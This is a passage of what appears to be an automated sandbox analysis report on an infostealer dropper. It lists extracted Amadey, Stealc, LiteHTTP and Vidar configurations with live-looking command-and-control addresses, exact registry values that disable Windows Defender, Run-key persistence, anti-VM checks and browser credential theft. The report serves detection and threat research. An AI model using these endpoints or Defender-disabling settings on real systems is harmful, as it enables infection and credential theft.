Analysis
-
max time kernel
121s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 18:03
Static task
static1
Behavioral task
behavioral1
Sample
daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe
Resource
win10v2004-20250217-en
General
-
Target
daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe
-
Size
1.8MB
-
MD5
44432f95b130ce27ffe942af9562c738
-
SHA1
8d44dd529c59881f2e728593b373f2eff42be305
-
SHA256
daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca
-
SHA512
48c8b0f3d62a8d81129129e80bd432d949a644023a88568fb1aa5fce8c6731f70c5282bc981ad68cfd3eb1fc5ef3ac380dd29b2daf8577c265a24c6140481ff0
-
SSDEEP
24576:mbsa4Csaaeb3mSAIfnn8SUFrUL299r2qoCwYl2Rg6atG4pk8H1w4I7HhrYFAOOtw:WQmhnc9rr2RxalblILoAVbuAjJ4
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Signatures
-
Amadey family
-
Detect Vidar Stealer 6 IoCs
resource yara_rule behavioral1/memory/3488-588-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3488-589-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3488-585-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3488-583-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3488-581-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3488-580-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/2160-509-0x0000000000180000-0x00000000005C8000-memory.dmp healer behavioral1/memory/2160-508-0x0000000000180000-0x00000000005C8000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" da4812e273.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" da4812e273.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection da4812e273.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" da4812e273.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" da4812e273.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" da4812e273.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" da4812e273.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" da4812e273.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications da4812e273.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" da4812e273.exe -
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 25f1d18449.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ da4812e273.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 09870567f4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5ad02b1c89.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e222971673.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cdc919a8cd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e11988fb68.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3756 powershell.exe 3660 powershell.exe 1628 powershell.exe -
Creates new service(s) 2 TTPs
-
Download via BitsAdmin 1 TTPs 3 IoCs
pid Process 3240 bitsadmin.exe 1756 bitsadmin.exe 3204 bitsadmin.exe -
Downloads MZ/PE file 20 IoCs
flow pid Process 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 5 320 rapes.exe 9 2188 BitLockerToGo.exe 35 2712 BitLockerToGo.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1780 chrome.exe 3564 chrome.exe 1648 chrome.exe 3356 chrome.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000500000001a44e-558.dat net_reactor behavioral1/memory/3408-569-0x0000000000070000-0x00000000000D0000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 25f1d18449.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e222971673.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion da4812e273.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cdc919a8cd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e11988fb68.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5ad02b1c89.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 09870567f4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e11988fb68.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5ad02b1c89.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion da4812e273.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 09870567f4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cdc919a8cd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 25f1d18449.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e222971673.exe -
Executes dropped EXE 30 IoCs
pid Process 320 rapes.exe 1692 09870567f4.exe 1948 9f62cbbc9c.exe 1568 9f62cbbc9c.exe 1768 9f62cbbc9c.exe 2932 9f62cbbc9c.exe 2900 9f62cbbc9c.exe 1988 cdc919a8cd.exe 2060 e11988fb68.exe 632 5ad02b1c89.exe 880 25f1d18449.exe 2444 e222971673.exe 1940 2085eb7ce3.exe 2160 da4812e273.exe 3264 ce4pMzk.exe 3408 mAtJWNv.exe 3472 mAtJWNv.exe 3480 mAtJWNv.exe 3488 mAtJWNv.exe 3844 SvhQA35.exe 1756 chromium.exe 2200 FvbuInU.exe 3828 Ps7WqSx.exe 3980 zY9sqWs.exe 1920 Y87Oyyz.exe 3440 Y87Oyyz.exe 296 SplashWin.exe 2352 SplashWin.exe 3208 MCxU5Fj.exe 3304 MCxU5Fj.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 25f1d18449.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine e222971673.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine da4812e273.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine cdc919a8cd.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 5ad02b1c89.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 09870567f4.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine e11988fb68.exe -
Loads dropped DLL 64 IoCs
pid Process 2016 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 1948 9f62cbbc9c.exe 1948 9f62cbbc9c.exe 1948 9f62cbbc9c.exe 1948 9f62cbbc9c.exe 2236 WerFault.exe 2236 WerFault.exe 2236 WerFault.exe 2236 WerFault.exe 2236 WerFault.exe 1756 WerFault.exe 1756 WerFault.exe 1756 WerFault.exe 1756 WerFault.exe 1756 WerFault.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 2972 WerFault.exe 2972 WerFault.exe 2972 WerFault.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 2188 BitLockerToGo.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 2712 BitLockerToGo.exe 320 rapes.exe 320 rapes.exe 3408 mAtJWNv.exe 3408 mAtJWNv.exe 3408 mAtJWNv.exe 3568 WerFault.exe 3568 WerFault.exe 3568 WerFault.exe 320 rapes.exe 3844 SvhQA35.exe 1756 chromium.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 320 rapes.exe 3320 WerFault.exe 3320 WerFault.exe 3320 WerFault.exe 320 rapes.exe 1920 Y87Oyyz.exe 3440 Y87Oyyz.exe 3440 Y87Oyyz.exe 296 SplashWin.exe 296 SplashWin.exe 296 SplashWin.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features da4812e273.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" da4812e273.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\FbCMn8UO\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\25f1d18449.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105380101\\25f1d18449.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\e222971673.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105390101\\e222971673.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\2085eb7ce3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105400101\\2085eb7ce3.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\da4812e273.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105410101\\da4812e273.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3420 powercfg.exe 3816 powercfg.exe 1272 powercfg.exe 704 powercfg.exe 3204 powercfg.exe 3324 powercfg.exe 1112 powercfg.exe 3552 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00060000000186f4-331.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 2016 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 320 rapes.exe 1692 09870567f4.exe 1988 cdc919a8cd.exe 2060 e11988fb68.exe 632 5ad02b1c89.exe 880 25f1d18449.exe 2444 e222971673.exe 2160 da4812e273.exe 2200 FvbuInU.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1948 set thread context of 2900 1948 9f62cbbc9c.exe 38 PID 1692 set thread context of 2188 1692 09870567f4.exe 43 PID 1988 set thread context of 2712 1988 cdc919a8cd.exe 46 PID 3408 set thread context of 3488 3408 mAtJWNv.exe 78 PID 3208 set thread context of 3304 3208 MCxU5Fj.exe 103 PID 2352 set thread context of 3768 2352 SplashWin.exe 100 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3944 sc.exe 2568 sc.exe 3176 sc.exe 1996 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
pid pid_target Process procid_target 2236 1948 WerFault.exe 34 1756 2900 WerFault.exe 38 2972 880 WerFault.exe 49 3568 3408 WerFault.exe 75 3320 3980 WerFault.exe 88 3340 3208 WerFault.exe 102 3544 3304 WerFault.exe 103 2536 4088 WerFault.exe 120 1648 3188 WerFault.exe 160 -
System Location Discovery: System Language Discovery 1 TTPs 38 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 09870567f4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fltMC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 2085eb7ce3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e222971673.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9f62cbbc9c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5ad02b1c89.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 25f1d18449.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 2085eb7ce3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2085eb7ce3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language da4812e273.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9f62cbbc9c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cdc919a8cd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e11988fb68.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mAtJWNv.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mAtJWNv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 1560 taskkill.exe 1244 taskkill.exe 1984 taskkill.exe 1584 taskkill.exe 1136 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 e11988fb68.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a e11988fb68.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a e11988fb68.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 5ad02b1c89.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 